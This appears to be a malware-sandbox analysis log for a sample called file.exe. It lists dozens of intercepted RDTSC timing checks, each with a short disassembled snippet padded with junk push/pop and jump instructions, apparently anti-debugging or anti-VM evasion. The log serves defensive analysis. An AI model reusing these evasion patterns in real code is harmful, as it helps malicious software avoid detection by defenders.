                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7569 second address: DB7589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jne 00007FD2884F85C6h 0x00000010 jmp 00007FD2884F85CEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7589 second address: DB7599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 je 00007FD288CC4A66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5ED1 second address: DB5F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2884F85CBh 0x00000009 jmp 00007FD2884F85D8h 0x0000000e popad 0x0000000f jmp 00007FD2884F85D7h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB621D second address: DB6235 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB64DC second address: DB64E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB64E6 second address: DB64F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD288CC4A66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB64F0 second address: DB64F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB668C second address: DB6691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6691 second address: DB66A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D0h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB66A6 second address: DB66B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD288CC4A66h 0x0000000a jnp 00007FD288CC4A66h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB67F7 second address: DB680B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB69CE second address: DB69D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB69D6 second address: DB69E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD2884F85C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB69E2 second address: DB69E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE64E second address: DBE661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FD2884F85CDh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE661 second address: DBE682 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FD288CC4A72h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBEA75 second address: DBEA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBEA7F second address: DBEA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBEE06 second address: DBEE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBEE0A second address: DBEE0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBEE0E second address: DBEE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD2884F85C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBEE1A second address: DBEE1F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF138 second address: DBF161 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D7h 0x00000007 jo 00007FD2884F85C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007FD2884F85C6h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF161 second address: DBF165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF165 second address: DBF173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF48E second address: DBF492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF492 second address: DBF4AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85CBh 0x00000007 jo 00007FD2884F85C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF4AC second address: DBF4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jo 00007FD288CC4A66h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 je 00007FD288CC4A66h 0x0000001d push esi 0x0000001e pop esi 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFC98 second address: DBFC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3696 second address: DC36A5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jl 00007FD288CC4A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC36A5 second address: DC36AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC36AA second address: DC36B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC36B0 second address: DC36B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3C51 second address: DC3C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jp 00007FD288CC4A6Eh 0x0000000b jmp 00007FD288CC4A70h 0x00000010 push ebx 0x00000011 jo 00007FD288CC4A66h 0x00000017 push edi 0x00000018 pop edi 0x00000019 pop ebx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3C88 second address: DC3C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD2884F85C6h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8F22 second address: DC8F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCEF9A second address: DCEFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2884F85CEh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF402 second address: DCF414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD288CC4A6Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF566 second address: DCF58E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2884F85CCh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FD2884F85D1h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF58E second address: DCF592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF6F6 second address: DCF700 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD2884F85C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF700 second address: DCF70A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF70A second address: DCF71B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FD2884F85C8h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF71B second address: DCF721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF986 second address: DCF98A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF98A second address: DCF9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD288CC4A77h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF9AB second address: DCF9B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4A40 second address: DD4A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007FD288CC4A6Ch 0x00000011 popad 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4A61 second address: DD4A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4A67 second address: DD4A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FD288CC4A80h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4A8C second address: DD4AAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD2884F85C6h 0x0000000a jmp 00007FD2884F85D4h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD9565 second address: DD9569 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD9569 second address: DD9575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD2884F85C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD9575 second address: DD958C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD288CC4A6Ch 0x00000008 push ecx 0x00000009 jnc 00007FD288CC4A66h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD90B1 second address: DD90C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD2884F85CAh 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD921C second address: DD923B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD288CC4A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FD288CC4A70h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD923B second address: DD924A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FD2884F85C6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD924A second address: DD9254 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD9254 second address: DD9258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE67B7 second address: DE67E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FD288CC4A66h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jo 00007FD288CC4A7Bh 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE63D8 second address: DE63DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE63DE second address: DE63E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE63E2 second address: DE63F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD2884F85C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE63F2 second address: DE63F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE63F6 second address: DE641D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD2884F85C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jne 00007FD2884F85D7h 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEAB68 second address: DEAB7C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD288CC4A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c je 00007FD288CC4A6Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEAB7C second address: DEABA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FD2884F85CCh 0x0000000b jmp 00007FD2884F85D8h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEABA6 second address: DEABAC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF0E8E second address: DF0E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF0E94 second address: DF0EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jg 00007FD288CC4A66h 0x0000000b jmp 00007FD288CC4A6Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E00070 second address: E0008E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD2884F85D0h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0008E second address: E000AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jns 00007FD288CC4A78h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E004D2 second address: E004DF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E00F12 second address: E00F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E00F19 second address: E00F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03D12 second address: E03D17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03D17 second address: E03D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E235FF second address: E2360B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD288CC4A66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E262FA second address: E262FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3BC68 second address: E3BC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD288CC4A66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3BC72 second address: E3BC9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85CDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD2884F85CEh 0x00000010 popad 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3F893 second address: E3F899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3F899 second address: E3F8AA instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3F8AA second address: E3F8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3F8B0 second address: E3F8B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FA56 second address: E3FA5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FCD4 second address: E3FCEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD2884F85D5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FCEE second address: E3FCFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FD288CC4A66h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FCFB second address: E3FD05 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD2884F85C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E42251 second address: E42273 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD288CC4A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jmp 00007FD288CC4A73h 0x00000013 pop edi 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44FBB second address: E44FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44FBF second address: E44FC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E478D8 second address: E478FA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD2884F85CDh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jmp 00007FD2884F85CAh 0x00000014 pop edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E47C5C second address: E47C92 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD288CC4A6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push edi 0x0000000e mov dword ptr [ebp+1246E304h], eax 0x00000014 pop edx 0x00000015 push 00000004h 0x00000017 and edx, dword ptr [ebp+122D1EB4h] 0x0000001d push 35B5F192h 0x00000022 push eax 0x00000023 push edx 0x00000024 je 00007FD288CC4A6Ch 0x0000002a je 00007FD288CC4A66h 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E47F22 second address: E47F28 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390ECA second address: 5390EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD288CC4A70h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390EDE second address: 5390EE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390EE2 second address: 5390F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD288CC4A73h 0x00000010 rdtsc
